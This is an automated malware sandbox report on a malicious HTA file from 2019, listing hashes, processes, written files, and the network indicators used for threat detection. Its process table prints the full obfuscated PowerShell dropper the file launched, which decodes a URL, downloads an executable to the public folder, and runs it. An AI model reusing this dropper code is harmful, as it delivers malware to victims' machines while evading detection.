download: | out-281656789.hta |
Full analysis: | https://app.any.run/tasks/09724bd4-c98f-4b6c-b5d9-3bc26458c2de |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 04:15:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF, LF line terminators |
MD5: | CA883534D55C7F7AEA4282A21BF619DD |
SHA1: | 7445A1B5A710D9E912693A1CDD5140D96448E6D1 |
SHA256: | 1C928C4C84A178153F15D7683677CDC65C26A1AB7A4C4BBB5545FC9041B920A8 |
SSDEEP: | 384:zwx/UOb3+IrVrhwx/UOb3+IrVrC8wx/UOb3+IrVrVUwx/UOb3+IrVrMSQwfZwx/p:Wtz/rVrAtz/rVrCZtz/rVr7tz/rVrMSY |
.html | | | HyperText Markup Language (100) |
---|
ContentType: | text/html; charset=utf-8 |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2980 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\out-281656789.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2052 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$mkxyn = Get-Random -Min 3 -Max 4;$yswdfzqj = ([char[]]([char]97..[char]122));$czhnbarlk = -join ($yswdfzqj | Get-Random -Count $mkxyn | % {[Char]$_});$fahrub = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$kxombqdw = $czhnbarlk + $fahrub;$arjblvyh=[char]0x53+[char]0x61+[char]0x4c;$znkevdj=[char]0x49+[char]0x45+[char]0x58;$seomu=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xtrghn $arjblvyh;$owqdvamji=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xtrghn axgbjhyrufq $znkevdj;$jamxtorpz=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|axgbjhyrufq;xtrghn gyxim $seomu;$jveybqpmdi = $jamxtorpz + [char]0x5c + $kxombqdw;;;;$wxhsapinloe = 'aHR0cDovL2FkZC53b2tvbS5jZi9tYWxsZWVlZWVra2tra19Qcm90ZWN0ZWQ=';$wxhsapinloe=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wxhsapinloe));$lhoqa = New-Object $owqdvamji;$qwlnhdemt = $lhoqa.DownloadData($wxhsapinloe);[IO.File]::WriteAllBytes($jveybqpmdi, $qwlnhdemt);gyxim $jveybqpmdi;;$lwaexoqg = @($rvtqsualfd, $xeuyg, $rdhvtzbon, $ckhpbyxrt);foreach($aufidmzys in $lwaexoqg){$null = $_}"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2052 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H1A7ZPY9A3GU1H9YRJST.temp | — | |
MD5:— | SHA256:— | |||
2052 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17a9fb.TMP | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
2052 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2052 | powershell.exe | GET | 404 | 68.183.80.108:80 | http://add.wokom.cf/malleeeeekkkkk_Protected | US | html | 341 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2052 | powershell.exe | 68.183.80.108:80 | add.wokom.cf | DSL Extreme | US | suspicious |
Domain | IP | Reputation |
---|---|---|
add.wokom.cf |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .cf Domain |